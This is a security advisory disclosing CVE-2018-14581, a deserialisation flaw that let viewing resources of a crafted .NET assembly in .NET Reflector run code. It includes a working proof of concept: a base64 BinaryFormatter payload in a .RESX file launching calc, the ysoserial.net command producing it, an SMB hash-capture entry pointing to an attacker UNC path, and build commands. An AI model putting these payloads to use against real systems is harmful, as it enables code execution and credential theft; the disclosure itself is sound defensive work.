Technical Advisory: Code Execution by Viewing Resource Files in .NET Reflector

Vendor: Redgate
Vendor URL: https://www.red-gate.com/
Versions affected: prior to 10.0.7.774 (24th July, 2018)
Systems Affected: .NET Reflector
Author: Soroush Dalili (@irsdl)
Advisory URL / CVE Identifier:
 https://documentation.red-gate.com/ref10/release-notes-and-other-versions/net-reflector-10-0-release-notes (CVE-2018-14581)
Risk: Critical

Summary

It was possible to execute code by decompiling a compiled .Net object (such as DLL or EXE) with an embedded resource file.

An attacker could target developing or security companies who used the affected tool to view the decompiled resources.

Location

Clicking the Resources section of a decompiled malicious file could trigger the issue:

Impact

It was possible to execute code and commands on the affected applications.

Details

The root cause of the vulnerability has been discussed at the following blog post:

https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/august/aspnet-resource-files-resx-and-deserialisation-issues/

Proof of Concept

Although in this document the command line tools have been used to create a malicious DLL file, Visual Studio could also be used to make the process easier.

Step 1: Creating a .RESX File

The following resource file shows an example that opens calculator:

<?xml version="1.0" encoding="utf-8"?>
<root>
 <!-- 
 Microsoft ResX Schema 
 
 Version 2.0
 
 The primary goals of this format is to allow a simple XML format 
 that is mostly human readable. The generation and parsing of the 
 various data types are done through the TypeConverter classes 
 associated with the data types.
 
 Example:
 
 ... ado.net/XML headers   schema ...
 <resheader name="resmimetype">text/microsoft-resx</resheader>
 <resheader name="version">2.0</resheader>
 <resheader name="reader">System.Resources.ResXResourceReader, System.Windows.Forms, ...</resheader>
 <resheader name="writer">System.Resources.ResXResourceWriter, System.Windows.Forms, ...</resheader>
 <data name="Name1"><value>this is my long string</value><comment>this is a comment</comment></data>
 <data name="Color1" type="System.Drawing.Color, System.Drawing">Blue</data>
 <data name="Bitmap1" mimetype="application/x-microsoft.net.object.binary.base64">
 <value>[base64 mime encoded serialized .NET Framework object]</value>
 </data>
 <data name="Icon1" type="System.Drawing.Icon, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
 <value>[base64 mime encoded string representing a byte array form of the .NET Framework object]</value>
 <comment>This is a comment</comment>
 </data>
 
 There are any number of "resheader" rows that contain simple 
 name/value pairs.
 
 Each data row contains a name, and value. The row also contains a 
 type or mimetype. Type corresponds to a .NET class that support 
 text/value conversion through the TypeConverter architecture. 
 Classes that don't support this are serialized and stored with the 
 mimetype set.
 
 The mimetype is used for serialized objects, and tells the 
 ResXResourceReader how to depersist the object. This is currently not 
 extensible. For a given mimetype the value must be set accordingly:
 
 Note - application/x-microsoft.net.object.binary.base64 is the format 
 that the ResXResourceWriter will generate, however the reader can 
 read any of the formats listed below.
 
 mimetype: application/x-microsoft.net.object.binary.base64
 value : The object must be serialized with 
 : System.Runtime.Serialization.Formatters.Binary.BinaryFormatter
 : and then encoded with base64 encoding.
 
 mimetype: application/x-microsoft.net.object.soap.base64
 value : The object must be serialized with 
 : System.Runtime.Serialization.Formatters.Soap.SoapFormatter
 : and then encoded with base64 encoding.
 mimetype: application/x-microsoft.net.object.bytearray.base64
 value : The object must be serialized into a byte array 
 : using a System.ComponentModel.TypeConverter
 : and then encoded with base64 encoding.
 -->
 <xsd:schema id="root"  xmlns_xsd="http://www.w3.org/2001/XMLSchema" xmlns_msdata="urn:schemas-microsoft-com:xml-msdata">
 <xsd:import namespace="http://www.w3.org/XML/1998/namespace" />
 <xsd:element name="root" msdata_IsDataSet="true">
 <xsd:complexType>
 <xsd:choice maxOccurs="unbounded">
 <xsd:element name="metadata">
 <xsd:complexType>
 <xsd:sequence>
 <xsd:element name="value" type="xsd:string" minOccurs="0" />
 </xsd:sequence>
 <xsd:attribute name="name" use="required" type="xsd:string" />
 <xsd:attribute name="type" type="xsd:string" />
 <xsd:attribute name="mimetype" type="xsd:string" />
 <xsd:attribute ref="xml:space" />
 </xsd:complexType>
 </xsd:element>
 <xsd:element name="assembly">
 <xsd:complexType>
 <xsd:attribute name="alias" type="xsd:string" />
 <xsd:attribute name="name" type="xsd:string" />
 </xsd:complexType>
 </xsd:element>
 <xsd:element name="data">
 <xsd:complexType>
 <xsd:sequence>
 <xsd:element name="value" type="xsd:string" minOccurs="0" msdata_Ordinal="1" />
 <xsd:element name="comment" type="xsd:string" minOccurs="0" msdata_Ordinal="2" />
 </xsd:sequence>
 <xsd:attribute name="name" type="xsd:string" use="required" msdata_Ordinal="1" />
 <xsd:attribute name="type" type="xsd:string" msdata_Ordinal="3" />
 <xsd:attribute name="mimetype" type="xsd:string" msdata_Ordinal="4" />
 <xsd:attribute ref="xml:space" />
 </xsd:complexType>
 </xsd:element>
 <xsd:element name="resheader">
 <xsd:complexType>
 <xsd:sequence>
 <xsd:element name="value" type="xsd:string" minOccurs="0" msdata_Ordinal="1" />
 </xsd:sequence>
 <xsd:attribute name="name" type="xsd:string" use="required" />
 </xsd:complexType>
 </xsd:element>
 </xsd:choice>
 </xsd:complexType>
 </xsd:element>
 </xsd:schema>
 <resheader name="resmimetype">
 <value>text/microsoft-resx</value>
 </resheader>
 <resheader name="version">
 <value>2.0</value>
 </resheader>
 <resheader name="reader">
 <value>System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
 </resheader>
 <resheader name="writer">
 <value>System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
 </resheader>
 <assembly alias="System.Windows.Forms" name="System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />
 <data name="test" mimetype="application/x-microsoft.net.object.binary.base64">
 <value>AAEAAAD/////AQAAAAAAAAAMAgAAAElTeXN0ZW0sIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BQEAAACEAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLlNvcnRlZFNldGAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAFQ291bnQIQ29tcGFyZXIHVmVyc2lvbgVJdGVtcwADAAYIjQFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0IAgAAAAIAAAAJAwAAAAIAAAAJBAAAAAQDAAAAjQFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0BAAAAC19jb21wYXJpc29uAyJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyCQUAAAARBAAAAAIAAAAGBgAAAAcvYyBjYWxjBgcAAAADY21kBAUAAAAiU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcgMAAAAIRGVsZWdhdGUHbWV0aG9kMAdtZXRob2QxAwMDMFN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeS9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvbkhvbGRlci9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvbkhvbGRlcgkIAAAACQkAAAAJCgAAAAQIAAAAMFN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQcAAAAEdHlwZQhhc3NlbWJseQZ0YXJnZXQSdGFyZ2V0VHlwZUFzc2VtYmx5DnRhcmdldFR5cGVOYW1lCm1ldGhvZE5hbWUNZGVsZWdhdGVFbnRyeQEBAgEBAQMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5BgsAAACwAlN5c3RlbS5GdW5jYDNbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5EaWFnbm9zdGljcy5Qcm9jZXNzLCBTeXN0ZW0sIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0GDAAAAEttc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkKBg0AAABJU3lzdGVtLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OQYOAAAAGlN5c3RlbS5EaWFnbm9zdGljcy5Qcm9jZXNzBg8AAAAFU3RhcnQJEAAAAAQJAAAAL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyBwAAAAROYW1lDEFzc2VtYmx5TmFtZQlDbGFzc05hbWUJU2lnbmF0dXJlClNpZ25hdHVyZTIKTWVtYmVyVHlwZRBHZW5lcmljQXJndW1lbnRzAQEBAQEAAwgNU3lzdGVtLlR5cGVbXQkPAAAACQ0AAAAJDgAAAAYUAAAAPlN5c3RlbS5EaWFnbm9zdGljcy5Qcm9jZXNzIFN0YXJ0KFN5c3RlbS5TdHJpbmcsIFN5c3RlbS5TdHJpbmcpBhUAAAA+U3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MgU3RhcnQoU3lzdGVtLlN0cmluZywgU3lzdGVtLlN0cmluZykIAAAACgEKAAAACQAAAAYWAAAAB0NvbXBhcmUJDAAAAAYYAAAADVN5c3RlbS5TdHJpbmcGGQAAACtJbnQzMiBDb21wYXJlKFN5c3RlbS5TdHJpbmcsIFN5c3RlbS5TdHJpbmcpBhoAAAAyU3lzdGVtLkludDMyIENvbXBhcmUoU3lzdGVtLlN0cmluZywgU3lzdGVtLlN0cmluZykIAAAACgEQAAAACAAAAAYbAAAAcVN5c3RlbS5Db21wYXJpc29uYDFbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dCQwAAAAKCQwAAAAJGAAAAAkWAAAACgs=</value>
 </data>
</root>

The highlighted payload above was generated by using the ysoserial.net tool (https://github.com/pwntester/ysoserial.net/):

ysoserial.exe -f BinaryFormatter -g TypeConfuseDelegate -o base64 -c "calc"

In order to create payloads in different formats and save them in resource files, please refer to the following blog post:

https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/august/aspnet-resource-files-resx-and-deserialisation-issues/

As described in the blog post, SMB hash hijacking is also possible via UNC path with the System.Resources.ResXFileRef type. It should be noted that usually user’s SMB hash is more valuable than the web server’s user. Therefore, the risk is slightly higher when this issue is exploited in the decompiler. An example was:

<data name="foobar" type="System.Resources.ResXFileRef, System.Windows.Forms">
 <value>AttackerServertesttest;System.Byte[], mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
 </data>

Step 2: Compiling the RESX File

In order to embed a malicious resource file in a .Net application for this example, it has to be compiled first. The following command could be used to compile a .RESX file to create a .RESOURCES file:

resgen.exe malicious.resx

Step 3: Compiling a .Net Code with a Malicious Resource

The following C# code can be used as an example:

using System;

class Example
{
 static void Main()
 {
 Console.WriteLine("done!");
  }
 }

The following command was used to compile the above C# code with an embedded malicious resource file:

csc.exe mycode.cs /res:malicious.resources /out:mycode.exe

Step 4: Exploitation

The calculator application was opened after decompiling the mycode.exe file from the previous step and clicking on Resources.

Recommendation

Update to the latest version (10.0.7.774 at the time of this advisory).

Vendor Communication

17/07/2018 Issue reported to the vendor
… multiple emails were exchanged regarding the solution …
24/07/2018 Reported issue was patched

About NCC Group

NCC Group is a global expert in cyber security and risk mitigation, working with businesses to protect their brand, value and reputation against the ever-evolving threat landscape. With our knowledge, experience and global footprint, we are best placed to help businesses identify, assess, mitigate respond to the risks they face. We are passionate about making the Internet safer and revolutionising the way in which organisations think about cyber security.

Written by:  Soroush Dalili